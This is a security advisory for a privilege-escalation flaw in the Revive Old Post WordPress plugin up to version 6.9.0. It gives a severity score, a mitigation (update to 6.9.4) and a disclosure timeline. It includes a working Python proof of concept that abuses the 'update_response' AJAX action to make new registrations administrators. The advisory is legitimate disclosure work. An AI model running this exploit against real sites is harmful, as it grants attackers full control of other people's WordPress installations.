Revive Old Post <=6.9.0, Privilege Escalation
Leveraging a publicly accessible AJAX function named ‘update_response’, it is possible to update any option with the WordPress installation. Using this vulnerability, it is possible to gain administrative access to the WordPress installation by updating the options ‘default_role’ and ‘users_can_register’, and then creating a new account. This new account will be created with administrative privileges, so long as these two options are updated to the values, as shown in the PoC below.
Homepage
https://wordpress.org/plugins/tweet-old-post/
CVSS Score
9
CSSS Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:C)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 6.9.4.
Proof of Concept
import requests
target = 'http://localhost'
url = '%s/wp-admin/admin-ajax.php'%target
payload = {
"action":"update_response",
"dataSent[dataSent]":"default_role=administrator&users_can_register=1"}
requests.post(url, data=payload)
url = '%s/wp-login.php?action=register'%target
payload = {
"user_login":"test",
"user_email":"test@test.com",
"redirect_to":"",
"wp-submit":"Register"
}
requests.post(url, data=payload)Timeline
- 2015-01-05: Discovered
- 2015-01-05: Vendor notified
- 2015-01-05: Vendor responded
- 2015-01-11: 6.9.0 released – vulnerability still present
- 2015-01-14: 6.9.4 released – issue resolved
- 2015-01-15: CVE Requested
- 2015-02-02: Advisory released